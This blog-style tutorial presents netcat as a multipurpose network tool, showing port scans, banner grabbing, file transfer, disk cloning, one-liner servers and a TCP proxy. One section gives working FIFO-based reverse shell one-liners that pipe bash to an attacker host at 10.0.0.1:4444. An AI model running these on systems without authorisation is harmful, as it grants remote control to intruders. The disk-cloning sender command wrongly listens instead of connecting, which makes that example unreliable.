Netcat: it's not just Telnet. It's network duct tape and magic.

If I were sent to a deserted digital island and allowed to take only one networking utility — I would unhesitatingly choose Netcat.

The official documentation (man nc) dryly states: “a utility for reading from and writing to network connections using TCP or UDP.”
In practice it’s the Swiss army knife of the network engineer, replacing dozens of specialized programs.

The article uses examples for OpenBSD netcat — this is the one that ships by default in Ubuntu 20.04+, Debian 10+, Fedora, Arch, Alpine and most modern distributions.

1. Diagnostics: better than ping

ping only checks ICMP. Netcat checks the actual service you need.

Quiet port scanning

nc -zv 192.168.1.10 20-80
nc -zv example.com 80 443 22

• -z — do not send data, only check the connection
• -v — verbose output
• -w 3 — 3 second timeout (I recommend adding)

Manual interaction with services (banner grabbing)

printf "HEAD / HTTP/1.0\r\n\r\n" | nc -w 3 google.com 80
echo "QUIT" | nc -w 3 smtp.gmail.com 25

2. File transfer and disk cloning

No scp, rsync or USB stick? Netcat to the rescue.

Simple file transfer

Receiver:

nc -l -p 9899 > backup.iso

Sender:

nc 192.168.1.10 9899 < backup.iso

Disk cloning over the network with compression (very fast)

Receiver:

nc -l -p 9899 | pigz -dc | sudo dd of=/dev/sdb bs=4M status=progress

Sender:

sudo dd if=/dev/sda bs=4M status=progress | pigz -1 | nc -l 9899

If pigz is not available — replace it with gzip, but it will be slower.

3. MacGyver-style: jaw-dropping one-liners

Web server in 5 seconds (works reliably)

while true; do
  echo -e "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>It works!</h1>" | \
  nc -l -p 8080 -q 1
done

Or serving a real file:

while true; do cat response.txt | nc -l 127.0.0.1 8080 -q 1; done

Simple chat server

Server:

nc -l -p 7777

Client:

nc 192.168.1.10 7777

Type to each other — everything in real time.

Proxy/TCP tunnel through a single port (via FIFO)

mkfifo /tmp/backpipe
nc -l 8080 < /tmp/backpipe | nc database.internal 5432 > /tmp/backpipe

Now everything that arrives on your 8080 port will be forwarded to the internal PostgreSQL.

4. Reverse shell without the -e flag (works on OpenBSD netcat)

Important: modern OpenBSD netcat does not include the -e flag for security reasons (unlike the old GNU netcat).

A working and fully compatible method in 2025:

On the attacker machine (listening):

nc -lvkp 4444

On the target machine (one line):

rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc 10.0.0.1 4444 >/tmp/f

Or even shorter using mknod:

mknod /tmp/p p
/bin/bash -i < /tmp/p 2>&1 | nc 10.0.0.1 4444 >/tmp/p

You get a full interactive shell.

5. When netcat is not enough — use Ncat or Socat

• Ncat (from the Nmap package) — supports -e, SSL, proxies, multiple simultaneous clients
• Socat — even more powerful, but more complex in syntax

Installation:

# Ncat
sudo apt install nmap    # already includes ncat

# Socat
sudo apt install socat

Conclusion

Netcat is the embodiment of the Unix philosophy:
“Do one thing and do it well” — just move bytes from point A to point B.
What those bytes become depends only on your imagination and knowledge of stdin/stdout.

Try transferring a file from your laptop to your phone via Termux today.
After that you’ll never look at nc as “just another telnet” again.